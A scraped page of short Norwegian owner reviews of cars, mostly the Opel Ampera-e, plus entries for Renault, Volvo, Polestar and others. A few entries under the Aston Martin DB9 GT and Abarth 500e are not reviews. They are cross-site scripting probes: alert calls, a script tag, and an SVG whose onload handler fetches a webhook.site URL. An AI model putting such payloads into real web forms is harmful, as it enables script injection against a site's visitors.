Vurdert av Johannes
Opel Ampera-e (2019)
Veldig god bil Har hatt den siden den var ny. Eneste reklamasjon var radio som ble byttet. Ikke mulig å betjene den via App lenger
Opel Ampera-e (2019)
Veldig grei bil. Det eneste er at radio måtte byttes . God plass, mulighet for takstarkiv, greie skinnseter, rimelig i drift.. litt lang ladetid på hurtiglader, ikke varmepumpe. Venter på nytt b
Opel Ampera-e (2019)
Super bil. Familiens beste venn.
Opel Ampera-e (2019)
Kjørt 58 000 problemfrie kilometer/// fått batteriskifte og ytterligere garantier
Opel Ampera-e (2019)
En veldig god bil. Kjørt 30000 uten en eneste feil. God rekkevidde. Bra med plass både i kupeen og bagasje. Rask og kvikk bil. Bare synd importen nå er slutt etter salg av Opel fra GM til PSA. Enes
Opel Ampera-e (2019)
Det som trekker ned og ødelegger en ellers flott bil er setene, sannsynligvis de dårligste setene som finnes på markedet i en nyere bil.
Opel Ampera-e (2019)
Veldig fornøyd med denne bilen. Den var den eneste alternativet til Tesla i forhold til kjørelengde i 2017. Synd at Opel ikke har videreutviklet modellen med mer moderne batterier, varmepumpe, adapt
Opel Ampera-e (2018)
Alt i alt en veldig god bil. Ville anbefalt den uten forbehold om jeg var trygg på å at alle reservedeler kunne skaffes raskt og enkelt.
Opel Ampera-e (2018)
Fornøyd med bilen etter bytte av batteri og ny rekkevidderekord.
Opel Ampera-e (2018)
.
Opel Ampera-e (2018)
Super elbil med meget god rekkevidde på sommertid, sånn passe på vintertid. Treig hurtiglading, særlig på vintertid. Ellers en meget førnøyd eier.
Opel Ampera-e (2018)
Kvalitetsbil. Har kjørt 135 000 km uten feil og kostnader. Kun service og ladeutgifter. Anbefales.
Opel Ampera-e (2018)
Opel Ampera-e (2018)
En fantastisk bil- Veldig lettkjørt, kjapp og morsom bil. Synd at Opel ikke får Ampera som Bolt 2. Har bare gode ord å si om denne bilen. Til og med setene overrasker meg positivt. De har det m
Opel Ampera-e (2018)
God og kvikk bil å kjøre. Gode kjøreegenskaper. Litt langsom å lade pga at det ikke er oppvarming av batteri og at ladningen starter langsomt.
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km